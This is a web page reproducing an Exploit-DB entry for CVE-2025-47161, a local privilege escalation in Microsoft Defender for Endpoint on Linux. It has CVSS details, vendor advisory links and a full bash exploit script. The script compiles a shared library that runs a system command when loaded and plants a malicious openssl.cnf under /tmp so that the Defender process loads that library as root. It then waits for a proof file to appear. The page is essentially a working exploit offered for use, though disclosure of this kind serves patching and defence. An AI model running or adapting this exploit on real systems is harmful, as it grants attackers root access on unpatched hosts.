Microsoft Defender for Endpoint (MDE) – Elevation of Privilege

July 8, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title Microsoft Defender for Endpoint (MDE) – Elevation of Privilege
Exploit ID EDB-ID:52355
Type exploitdb
Published 2025-07-08T00:00:00
Modified 2025-07-08T00:00:00

CVSS Information

CVSS Score 7.8
Severity HIGH
Vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE Information

  • CVE-2025-47161

Exploit Description

!/bin/bash Exploit Title: Microsoft Defender for…

Exploit Code

#!/bin/bash

# Exploit Title: Microsoft Defender for Endpoint (MDE) – Elevation of Privilege

# Date: 2025-05-27

# Exploit Author: Rich Mirch

# Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/

# Software Link:

https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux

# Versions:

# Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0

# Vulnerable Feb-2025 Build: 101.24122.0008 20.124112.0008.0

# Vulnerable Feb-2025 Build: 101.24112.0003 30.124112.0003.0

# Vulnerable Jan-2025 Build: 101.24112.0001 30.124112.0001.0

# Vulnerable Jan-2025 Build: 101.24102.0000 30.124102.0000.0

#

# Vendor Advisory:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161

# Blog: http://stratascale.com/vulnerability-alert-cve202547161

# Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS

# CVE : CVE-2025-47161

#

echo “MDE Version: $(mdatp version)”

# stage

cat >mde-exp.c</*

* Build procedure:

* gcc -fPIC -o woot.o -Wall -c woot.c

* gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o

*/

#include

#include

#include

#include

void woot(){

// for manual testing

if(isatty(STDERR_FILENO)) {

fprintf(stderr,”Woot!\n”);

}

system(“ps -ef > /woot.txt”);

sleep(3000000);

}

EOF

# build exploit

gcc -fPIC -o woot.o -Wall -c mde-exp.c

gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o

mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/

cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf

<# Malicious openssl.cnf

openssl_conf = openssl_init

[openssl_init]

engines = engine_section

[engine_section]

woot = woot_section

[woot_section]

engine_id = woot

dynamic_path = /tmp/woot.so

init = 0

EOF

echo “Checking every 15 seconds for /woot.txt”

while true

do

if [[ -f /woot.txt ]]

then

echo “WOOT – /woot.txt exists”

ls -ld /woot.txt

exit

fi

sleep 15

done

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.